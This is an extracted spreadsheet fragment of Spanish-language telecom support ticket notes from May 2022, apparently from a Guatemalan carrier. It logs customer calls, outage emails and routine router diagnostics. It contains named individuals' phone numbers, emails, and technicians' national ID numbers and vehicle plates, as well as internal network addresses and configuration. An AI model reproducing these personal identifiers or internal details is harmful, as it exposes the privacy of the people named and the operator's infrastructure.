    <t>SE HABLA CON ELFEGO DIAZ 58261414 SE LE INDICA QUE NO SE PUEDE CERTIFICAR EL E1 YA QUE CLIENTE NO TIENE SUS CREDENCIALES, NOS COMENTA QUE EL CLIENTE DEBE SOLICITARLAS POR CORREO POR LO QUE TEC DE PLEX SE RETIRA. CLIENTE QUE LO ATENDIÓ FUE ARIEL ARIAS 54569231</t>
  </si>
  <si>
    <t>-*- SARAI ARDON 32786273 (CLIENTE) NO RESPONDE, SE LLAMARA LUEGO -*
2001758666
2001758977</t>
  </si>
  <si>
    <t>INFORMA ELFEGO DÍAZ 58261414  ID:2001162817 QUE YA ESTAN GESTIONADOS LOS ACCESOS INDICA QUE TÉCNICO PUEDE PREGUNTAR POR NANCY DÍAZ. SE LE INFORMA A ERWIN DEL CID.</t>
  </si>
  <si>
    <t>SE HABLA CON ELFEGO DIAZ 58261414 QUIEN ENLAZA LA LLAMADA CON CLAUDIA PAIZ DE UNIVERSIDAD DEL VALLE YA QUE GRUPO TE LLAMO TRABAJA PARA DICHA UNIVERSIDAD. SE LE SOLICITA A CLAUDIA QUE SE CONTACTE CON SONIA ARDON YA QUE NO NOS RESPONDE, PARA INDICARLE QUE SONIA DEBE SOLICITAR SUS CREDENCIALES A SU EJECUTIVO PARA PODER CERTIFICAR EL E1. CLAUDIA INDICA QUE SE CONTACTARÁ CON SONIA Y NOS COPIARÁ EN UN CORREO CUANDO SE TENGAN LAS CREDENCIALES.
RESULTADO: LLAMADA HECHA
NOMBRE: 58261414
NÚMERO: 58261414
INICIO: HOY, 10:29 A. M.
FIN: HOY, 10:46 A. M.
DURACIÓN: 17:19
ID DE LLAMADA: 2001874279</t>
  </si>
  <si>
    <t>SE LLAMA A NANCY DÍAZ 24144444 QUIEN COMENTA QUE EL PERMISO AÚN ESTÁ PENDIENTE YA QUE LA PERSONA ENCARGADA DE AUTORIZAR  JONATHAN NO SE ENCUENTRA EN EL EDIFICIO. SE LE BRINDA EL CONTACTO PARA INFORMARNOS CUANDO ESTÉN AUTORIZADOS LOS ACCESOS PARA PROCEDER CON LA CERTIFICACIÓN.  ID:2001172441</t>
  </si>
  <si>
    <t>F4561677</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANDERSON OKELY 36493515 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001096099</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE ESPAÑA 58343207 ENVIA DIRECTO A BUZON, SE INTENTARA LUEGO
-ID 2001097151</t>
  </si>
  <si>
    <t>F4561684</t>
  </si>
  <si>
    <t>NO RESPONDEN LA WO A CONMUTACION SE PROCEDE A DEJAR EN ETAPA PENDIENTE CLEINTE PARA ABRIR EN HORARIO DE PERSONAL HABIL Y SE PUEDA REVIZAR Y RESOLVER YA QUE A NIVEL WAN SE ENCUENTRA OPERATIVO</t>
  </si>
  <si>
    <t>MARCO TULIO RAMIREZ CHAVEZ SE SOLICITA APOYO NUEVAMENTE YA QUE SI SE ENCONTRABA EL NUMERO DE SERIE DE LA ONT</t>
  </si>
  <si>
    <t>ESTIMADOS CONMUTACIÓN.  SU AMABLE APOYO VERIFICANDO  EN DONDE SE ENCUENTRA PUERTO DE CLIENTE O APROVISIONARLO.  SE BUSCA CON GESTOR U2000 PERO NO SE LOCALIZA SERVICIO.  SE ADJUNTA FOTOGRAFIA DE NUMERO DE SERIE DE ONT Y SE COPIA . SEGUN DISEÑO SE ENCUENTRA EN:
GPON_SAN_JUAN_SACATEPEQUEZ_GSJSGTSJN1C1101A05COA1_(10.102.143.92) TARJETA 1 PUERTO 6    CDO/PDO    SJSG0104    SPLITTER    S021C_N_1    PUERTO SPLITTER    6     CT    027/028</t>
  </si>
  <si>
    <t>SE TIENE ADJUNTO EN EL TTK EL NUMERO DE SERIE PROPORCIONADO POR EL CLIENTE  EN DATOS ADJUNTOS</t>
  </si>
  <si>
    <t>***--- SE LLAMA A ELIAS SIERRA 504 94560221 PARA INDICAR AVANCES PERO NO CONTESTA --**
2001131095</t>
  </si>
  <si>
    <t>APERTURAR WO A CONMUTACION PARA APORVICIONAMIENTO DE EQUIPO  ONT DEL CLIENTE</t>
  </si>
  <si>
    <t>F4561701</t>
  </si>
  <si>
    <t>SE LLAMA A DANIEL QUIEN INDICA QUE ENVIARA AL SUPERVISOR SIN EMBARGO COMENTA QUE SERIA EL DIA DE MAÑANA POR LA HORA INDICA QUE TIPO 10 AM SE PUEDE SOLICITAR AVANCES-
SE ENVIA CORREO A CLIENTE
SD1125228 - ATM3433</t>
  </si>
  <si>
    <t>F4561724</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE ESTUARDO PEREZ PERO YA NO CONTESTA.
2001121880
COLA:
NOMBRE: A: 49688184
NÚMERO: 49688184
DURACIÓN: 0:00:16
ESTADO: MARCANDO
DETALLES: 49688184
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 12/05/2022 19:38:50</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE NOLIA BUCARO QUIEN UBICA EL EQUIPO TELLABS E INDICA QUE SE ENCUENTRA CON
PWR LINE 1 EN VERDE  PMA EN ROJO, SE APLICO RESET PERO NO HAY CAMBIOS.
CLIENTE SOLICITA VISITA TECNICA INDICA QUE EN EL PR VA A ESTAR ESTUARDO PEREZ 49688184.
2001105348
COLA:
NOMBRE: A: 50164761
NÚMERO: 50164761
DURACIÓN: 0:00:29
ESTADO: CONECTADA
DETALLES: 50164761
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 12/05/2022 17:39:04</t>
  </si>
  <si>
    <t>F4561728</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN INGRESA LA LLAMADA
##LLAMAADA DESDE VIVO</t>
  </si>
  <si>
    <t>***SE LLAMA A CLIENTE ADIN VELASQUEZ AL 40529383   CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001214533
**</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE PARA LOS PERMISOS
4561728 /BANCO INDUSTRIAL.- 3 CALLE ZONA 1 CALLE PRINCIPAL, A UN COSTADO DEL MERCADO LA DEMOCRACIA SAN MIGUEL / GDN 77904850
¿
MICROSOFT OUTLOOK
VIE 13/05/2022 9:23
NO SE PUDO ENTREGAR A ESTOS DESTINATARIOS O GRUPOS: RAULE.ALVAREZ@CLARO.COM.GT EL BUZÓN DE CORREO DEL DESTINATARIO ESTÁ LLENO Y NO PUEDE ACEPTAR MENSAJES POR EL MOMENTO. INTENTE REENVIAR EL MENSAJE MÁS TARDE O PÓNGASE EN CONTACTO CON EL DESTINATARIO DIRECTAMENTE.
¿
MICROSOFT OUTLOOK
VIE 13/05/2022 9:23
NO SE PUDO ENTREGAR A ESTOS DESTINATARIOS O GRUPOS: WALTER.REYNOSO@CLARO.COM.GT EL BUZÓN DE CORREO DEL DESTINATARIO ESTÁ LLENO Y NO PUEDE ACEPTAR MENSAJES POR EL MOMENTO. INTENTE REENVIAR EL MENSAJE MÁS TARDE O PÓNGASE EN CONTACTO CON EL DESTINATARIO DIRECTAMENTE.
MONICA YIREH CASTILLO POON
VIE 13/05/2022 9:23
BUENOS DÍAS ESTIMADOS SEÑORES BI,
POR ESTE MEDIO SOLICITA SU APOYO PARA COORDINAR EL ACCESO PARA EL PERSONAL QUE ESTARÁ ATENDIENDO LA FALLA REPORTADA EN BANCO INDUSTRIAL. - 3 CALLE ZONA 1 CALLE PRINCIPAL, A UN COSTADO DEL MERCADO LA DEMOCRACIA SAN MIGUEL PARA LA REVISIÓN DEL SERVICIO DE E1 77904850. ADJUNTO ENCONTRARÁ LOS DATOS DEL PERSONAL TÉCNICO.
QUEDAMOS A LA ESPERA DE SUS COMENTARIOS PARA PROCEDER A ENVIAR A LOS TÉCNICOS CUANDO YA ESTÉN LOS PERMISOS GESTIONADOS.
SALUDOS,</t>
  </si>
  <si>
    <t>F4561751</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE POR EL MOMENTO NO SE HA OBSERVADO EVENTOS DE RECONVERGENCIA:
DE: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 12 DE MAYO DE 2022 18:45
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; HERNANDEZ VAZQUEZ EDGAR JESUS &lt;EHVAZQUE@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002277118OC ::: TICKET CNOC IMSCI002748 ::: PACKET LOSS
BUENAS TARDES ESTIMADOS (A):
COMO PARTE DEL SEGUIMIENTO AL CASO ID LOCAL CONTR0002277118OC::: TICKET CNOC IMSCI002748, SOLICITAMOS DE SU AMABLE APOYO PARA VALIDAR SI AÚN PERSISTEN LOS INCONVENIENTES ANTES PLANTEADOS. POR EL MOMENTO SERVICIO SE MANTIENE ESTABLE ALCANZABLE A NIVEL DE PING, NO SE OBSERVAN EVENTOS DE RE CONVERGENCIA EN LOS SITIOS VERIFICADOS. QUEDAMOS AL PENDIENTE. SALUDOS CORDIALES.
FIGURA 1. SE VALIDA ENLACE OPERATIVO ALCANZABLE A NIVEL DE PING SIN PERDIDAS Y BGP ESTABLECIDO.</t>
  </si>
  <si>
    <t>F4561754</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JAVIER SANCHEZ AL 42980211 SOLICITA QUE SE DEJE EN OBSERVACION Y QUE SE LE LLAME MAÑANA A LAS 11:00 AM NUEVAMENTE**
ID 2001179224
**</t>
  </si>
  <si>
    <t>F4561756</t>
  </si>
  <si>
    <t>SE REVISA LAS INTERFACES FISICAS SOBRE EL SERVICIO  SE VALIDA QUE SE ENCUENTRA OPERATIVO POR PARTE DE CLARO
PETAPA#SH INT DESC | INC C-0201800193
GI1/6                          UP             UP       TIWS TACA (AVIANCA) GUA-A                                    TO INFO 6MB C-0201800193
GI1/6.1582                     UP             UP       TIWS TACA (AVIANCA) GUA-A                                    TO INFO 6MB C-0201800193
GI1/6.2584                     UP             UP       GESTION TIWS TACA (AVIANC                                    A) GUA-ATO INFO 6MB C-0201800193
PETAPA#
PE DONDE PASA  10.184.2.3
PETAPA#SH INT DESC | INC C-0201800192
GI1/6.952                      UP             UP       TIWS TACA-AVIANCA ATO MPLS PRINCIPAL 12MB C-0201800192
PETAPA#
PE 10.184.12.46
PE_CENTRALIZADO_ZAPOTE#SH IP ROUT VRF VPN_TIWS_ATENTO_TACA 10.235.42.74
C-0201800192 SE ENCUENTRA OPERATIVO POR PARTE DE CLARO
PE 10.184.12.46
ROUTING TABLE: VPN_TIWS_ATENTO_TACA
ROUTING ENTRY FOR 10.235.42.72/30
  KNOWN VIA "CONNECTED", DISTANCE 0, METRIC 0 (CONNECTED, VIA INTERFACE)
  REDISTRIBUTING VIA BGP 13682
  ADVERTISED BY BGP 13682
  ROUTING DESCRIPTOR BLOCKS:
  * DIRECTLY CONNECTED, VIA GIGABITETHERNET3/0/1.953
      ROUTE METRIC IS 0, TRAFFIC SHARE COUNT IS 1
PE_CENTRALIZADO_ZAPOTE#
PE_CENTRALIZADO_ZAPOTE#SH CONF | INC 10.235.42.74
  NEIGHBOR 10.235.42.74 REMOTE-AS 65000
  NEIGHBOR 10.235.42.74 TIMERS 10 30
  NEIGHBOR 10.235.42.74 ACTIVATE
  NEIGHBOR 10.235.42.74 SEND-COMMUNITY
  NEIGHBOR 10.235.42.74 AS-OVERRIDE
PE_CENTRALIZADO_ZAPOTE#
PE_CENTRALIZADO_ZAPOTE#SH RUN INT GIGABITETHERNET3/0/1.953
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 319 BYTES
!
INTERFACE GIGABITETHERNET3/0/1.953
 DESCRIPTION TIWS TACA-AVIANCA ATO MPLS REDUNDANTE 12MB C-0201800191
 ENCAPSULATION DOT1Q 953
 IP VRF FORWARDING VPN_TIWS_ATENTO_TACA
 IP ADDRESS 10.235.42.73 255.255.255.252
 SERVICE-POLICY INPUT INGRESO_VPN_TIWS_AVIANCA_12M
 SERVICE-POLICY OUTPUT EGRESO_VPN_TIWS_AVIANCA_12M
END</t>
  </si>
  <si>
    <t>SE VALIDA QUE EL SERVICIO SE ENCUENTRA POPERATIVO POR NUESTRA PARTE
PE 10.184.12.45
PE_CENTRALIZADO#SH IP ROUT VRF VPN_TIWS_ATENTO_TACA 10.235.42.70
ROUTING TABLE: VPN_TIWS_ATENTO_TACA
ROUTING ENTRY FOR 10.235.42.68/30
  KNOWN VIA "CONNECTED", DISTANCE 0, METRIC 0 (CONNECTED, VIA INTERFACE)
  REDISTRIBUTING VIA BGP 13682
  ADVERTISED BY BGP 13682
  ROUTING DESCRIPTOR BLOCKS:
  * DIRECTLY CONNECTED, VIA FASTETHERNET1/0/2.952
      ROUTE METRIC IS 0, TRAFFIC SHARE COUNT IS 1
PE_CENTRALIZADO#SH RUN INTER   FASTETHERNET1/0/2.952
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 315 BYTES
!
INTERFACE FASTETHERNET1/0/2.952
 DESCRIPTION TIWS TACA-AVIANCA ATO MPLS PRINCIPAL 12MB C-0201800192
 ENCAPSULATION DOT1Q 952
 IP VRF FORWARDING VPN_TIWS_ATENTO_TACA
 IP ADDRESS 10.235.42.69 255.255.255.252
 SERVICE-POLICY INPUT INGRESO_VPN_TIWS_AVIANCA_12M
 SERVICE-POLICY OUTPUT EGRESO_VPN_TIWS_AVIANCA_12M
END
PE_CENTRALIZADO#PIN  VRF VPN_TIWS_ATENTO_TACA 10.235.42.70
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 10.235.42.70, TIMEOUT IS 2 SECONDS:
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 1/1/4 MS
PE_CENTRALIZADO#PIN  VRF VPN_TIWS_ATENTO_TACA 10.235.42.70 RE 1000
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 1000, 100-BYTE ICMP ECHOS TO 10.235.42.70, TIMEOUT IS 2 SECONDS:
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!
SUCCESS RATE IS 99 PERCENT (999/1000), ROUND-TRIP MIN/AVG/MAX = 1/1/68 MS
PE_CENTRALIZADO#</t>
  </si>
  <si>
    <t>F4561774</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL  2320-5555 CONTESTA EL SEÑOR MANUEL GARCIA Y SOLICITA QUE SE LLAME AL SEÑOR LUIS FERNANDO 41752352 **
ID 2001139411
**</t>
  </si>
  <si>
    <t>**SE LLLAMA A CLIENTE LUIS FERNANDO AL 41752352 SE CONTACTA A CLIENTE Y SE DEJA EN LINEA CON GESTOR **
ID 2001140635
**</t>
  </si>
  <si>
    <t>F4561799</t>
  </si>
  <si>
    <t>###SE LLAMA  CLIENTE BYRON DELGFADO / 86931222 INDICA QUE ESTA CONECTANDO SU RED LAN QUE LE DEMOS UNA HORA PARA VERIFICAR SUS CONEXIONES DE DATOS
2001157933
COLA:
NOMBRE: A: 50586931222
NÚMERO: 50586931222
DURACIÓN: 0:01:20
ESTADO: CONECTADA
DETALLES: 50586931222
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 13/05/2022 09:15:22</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BYRON DELGADO / 86931222 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
ID 2001199655
**</t>
  </si>
  <si>
    <t>###SE LLAMA AL TECNICO JEFREY INDICA QUE EL CLIENTE SIGUE CONECTANDO SU RED LAN QUE SE LE DE MEDIA HORAS MAS ##
2001180716
COLA:
NOMBRE: A: 50587339666
NÚMERO: 50587339666
DURACIÓN: 0:01:10
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 50587339666
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 13/05/2022 10:21:54</t>
  </si>
  <si>
    <t>F4561816</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: JUEVES, 12 DE MAYO DE 2022 21:19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CC_DISTELSA_GT_3G_ZONA_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1816
ID: 61200234T
IDENTIFICADOR DEL CLIENTE:  CC_DISTELSA_GT_3G_ZONA_9
UBICADO EN:  1A CALLE 7-66 ZONA 9 GUATEMALA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4561817</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 2243-7253 RESPONDE JULIAN SALAZAR QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001138666</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DE PARTE DEL CLIENTE SOLICITANDO CAUSA DE AFECTACION Y QUE SE DEJE EN MONITOREO HASTA AL DIA DE MAÑANA 13/05 A LAS 8:00 AM, SE LE RESPONDE Y NOTIFICA A SAMUEL.ESTRADAG VIA SKYPE PARA EL CAMBIO DE ETAPA | WIP
DE: CORPOWALMART
ENVIADO EL: JUEVES, 12 DE MAYO DE 2022 20:18
PARA: STEVEN MARQUEZ (VENDOR); SAMUEL ANTONIO ESTRADA GREGORIO; CORPOWALMART; NOE PEREZ; CNOCCA; GRUPO N1
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA
ASUNTO: RE: ENLACE CAÍDO DE MAXI DESPENSA MORALES ID: 344400234
BUENA NOCHE STEVE
            EN RESPUESTA A SU CONSULTA LE COMENTO QUE NO SE APLICARON ACCIONES CORRECTIVAS NI DETECTAMOS AFECTACIÓN DE NUESTRO LADO, CON MUCHO GUSTO HEMOS DEJADO EN MONITOREO SU SERVICIO HASTA EL HORARIO SOLICITADO, AL CONCLUIR TIEMPO ESTAREMOS EN COMUNICACIÓN.
QUEDO ATENTO A SUS COMENTARIOS, SALUDOS CORDIALES.
DE: STEVEN MARQUEZ (VENDOR) [MAILTO:STEVEN.MARQUEZ@WALMART.COM]
ENVIADO EL: JUEVES, 12 DE MAYO DE 2022 20:09
PARA: SAMUEL ANTONIO ESTRADA GREGORIO; CORPOWALMART; NOE PEREZ; CNOCCA; GRUPO N1
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA
ASUNTO: RE: ENLACE CAÍDO DE MAXI DESPENSA MORALES ID: 344400234
BUENA NOCHE,
ALGUNA CAUSA DE LA CAÍDA Y DE LA SOLUCIÓN QUE SE LE DIO AL SERVICIO?
DEJAR EN MONITOREO PARA DÍA DE MAÑANA ALAS 8:00 DE LA MAÑANA.
SLDS;</t>
  </si>
  <si>
    <t>F4561838</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 51 74 52 99 CONTESTA LA SEÑORITA MONSERRAT GARRIDO CLIENTE INDICA QUE SE CONTACTARAN CON EL CL PARA SOLICITAR CONTACTO DE PR**
ID 2001134197
**</t>
  </si>
  <si>
    <t xml:space="preserve">
SEGUN LA INFORMACION DEL TTK SE VALIDA QUE NO SE TIENE  LLEGA AL ETX DE ULTIMA MILLA EN EL NODO ES NECESARIO REALIZAR PRUEBAS DE 1 ER NIVEL SOBRE EL SERVICIO
PING -M 10 -Q -VPN MONITOREO 10.82.57.249
  PING 10.82.57.249: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.82.57.249 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.32.39
DISPLAY IP ROUTING-TABLE VPN-INSTANCE MONITOREO 10.82.57.249
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : MONITOREO
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.82.57.192/26  DIRECT  0    0             D   10.82.57.193    GIGABITETHERNET1/0/3.2232			
RAD	ETX1	GESTION MEDIA	10.82.57.249/26	
CISCO	CSC1111	GESTION CPE	10.82.57.250/26	</t>
  </si>
  <si>
    <t>SE LE SOLICITA AL CLIENTE PRUEBAS CON EQUIPOS INDICA EL CLIENTE QUE CONTACTARA PERSONAL Y A LOS MINUTOS REESTABLECE EL SERVICIO POSIBLE CAUSA ENERGIA EN EL LUGAR  .</t>
  </si>
  <si>
    <t xml:space="preserve">
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO EL SERVICIO EL CLIENTE POSOBLEMENTE REALIZO REVICIONES DE 1 ER NIVEL Y SE REESTABLECIO EL SERVICIO .
NO SE TIENE GESTION DEL CPE
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 10.2.132.242
  PING 10.2.132.242: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.2.132.242 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.32.42
DISPLAY IP ROUTING-TABLE 10.2.132.242
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : _PUBLIC_
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.2.132.240/29  DIRECT  0    0             D   10.2.132.245    GIGABITETHERNET1/0/4.772			</t>
  </si>
  <si>
    <t>F4561846</t>
  </si>
  <si>
    <t>***SE LLAMA A CLIENTE GERENTE DE TIENDA AL 54330515  N O RESPONDE SE INTENTARA
LUEGO **
ID 2001134762
**</t>
  </si>
  <si>
    <t>*** SE TRATÓ DE CONTACTAR CON JOSE ESPAÑA 58343207 (ID  2001348446 ) SIN EMBARGO, NO SE LOGRA LA COMUNICACIÓN. ***</t>
  </si>
  <si>
    <t>*** SE TRATÓ DE INFORMAR A CLIENTE SAMUEL 42154554 (ID 2001352192), EN PUNTO REMOTO, PARA PODERLE INDICAR QUE SE NECESITA PRIMERO LA CONFIRMACIÓN DE INGRESO PARA EL PERSONAL TÉCNICO. NO SE LOGRA LA COMUNICACIÓN. ***</t>
  </si>
  <si>
    <t>*** SE TRATÓ DE CONTACTAR CON JOSE ESPAÑA 58343207 (ID  2001345412/2001345438), SIN EMBARGO, NO SE LOGRA LA COMUNICACIÓN. ***</t>
  </si>
  <si>
    <t>*** SE ENVÍAN DATOS DE PERSONAL TÉCNICO NUEVAMENTE A CLIENTE, A LA ESPERA DE AUTORIZACIÓN DE ACCESOS ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: SÁBADO, 14 DE MAYO DE 2022 7:00
PARA: GUSTAVO ADOLFO BARAHONA PUTUL &lt;GUSTAVO.BARAHONA@CLARO.COM.GT&gt;; SISTEMAS@INCOMEL.COM.GT &lt;SISTEMAS@INCOMEL.COM.GT&gt;
CC: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: INDUSTRIA COMERCIALIZADORA DE ELECTRODOMESTICOS, SOCIEDAD ANONIMA || SD1125259 || 535200055T || CAIDA TOTAL
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DEL CASO REPORTADO, SE REQUIERE REALIZAR UNA VISITA TÉCNICA A INSTALACIONES REMOTAS. POR LO QUE SE SOLICITA DE SU APOYO PODER GESTIONAR AUTORIZACIÓN DE ACCESOS CON CENTRO COMERCIAL PARA LA VERIFICACIÓN DEL SERVICIO, ADJUNTO DATOS DEL PERSONAL QUE SE HARÁ PRESENTE:
NOMBRE                                                                            DPI                         PLACA
IVAN ARRAZOLA                                                         2319 45019 0101             P-959DSN
EDY ESCALANTE                                                            1981 17108 0101           P-048GLD
JOSE ANGEL SANDOVAL                                            1796 76350 0101           P-351HMP
RENE CAMEROS COJON                                            2275 16001 0101             P-899HNK
HECTOR ROLANDO ALINAN PORON                       2360 72870 0208             P-280HNJ
BYRON CUTZAL                                                            1689 67987 0101           P-994FKH
WILSON WILFREDO ECHEVERRIA                             2592 44201 0101             P-148GTV
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A JOSÉ ESPAÑA/CLIENTE; SE LE INDICA LO DICHO EN CRONO ANTERIOR; ÉSTE PONE EN TRIPARTITA A PR; ÉSTE INDICA QUE HABLÓ CON ADMÓN DEL CENTRO COMERCIAL; LOS DÍAS MIÉRCOLES SÓLO PERMITEN INSTALACIONES NUEVA, PARA REVISIÓN SERÍA CUALQUIER DÍA HASTA LAS 15:00 HORAS, SE INFORMA DE LO ANTERIOR A LEONEL RODAS/GESTOR N1 VÍA TELEFÓNICA.</t>
  </si>
  <si>
    <t>SE CONTACTA JOSE ESPAÑA DEL 58343207 ID 2001231151 PARA EL SEGUMIENTO, COMENTA QUE TIENE AL SAMUEL FRANCO EL GERENTE  DE TIENDA PARA LAS PRUEBAS DE PRIMER NIVEL, SE LLAMA AL 8126 CON EL GESTOR LUVY.SANDOVAL ID 2001232537 ATIENDE FRANCISCO QUEZADA QUIEN TRANSFIERE CON EL GESTOR PERO NO RESPONDE SE LIBERA LA LLAMADA Y SE VUELVE A CONTACTAR AL 8126 ID 2001233781 INGRESA LA LLAMADA A LUVY.SANDOVAL PERO NO RESPONDE Y DERIVA LA LLAMADA Y ENTRA CON YENSI CALGUA Y SE LE BRINDA LA INFORMACION Y BRINDARA EL SEGUIMIENTO, SE DEJA CON EL PR EN LINEA.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HUGO 42154554 RESPONDE SAMUEL MENCIONA QUE AUN NO HA LLEGADO A LA TIENDA POR LO QUE SOLICITA LLAMADA EN 10 MIN
-ID 2001144018</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE HUGO AL 42154554 CONTESTA EL SEÑOR SAMUEL INDICA QUE YA ESTA ESTABLE Y OPERATIVO **
ID 2001835693
**</t>
  </si>
  <si>
    <t>*/*/*/*/CLIENTE JOSE ESPAÑA SE COMUNICA PARA AVANCES, SE LE INDICA QUE CON EL REINICIO SE VALIDO QUE HABIA RESTABLECIDO, CLIENTE INDICA QUE QUEDO A LA ESPERA DE LA LLAMADA A LAS 19:00 HRS COMO QUEDO CON LA GESTORA, YA QUE PERSISTE EL INCONVENIENTE, SE VALIDA QUE EL GESTOR ASIGNADO ES ALEJANDRO.NAVARRO POR LO QUE SE DEJA EN CONFERENCIA CLIENTE/GESTOR*/*/*/</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HUGO, RESPONDE Y LUEGO SE CORTA LA LLAMADA, SE INTENTARA LUEGO.
2001179254
COLA:
NOMBRE: A: 42154554
NÚMERO: 42154554
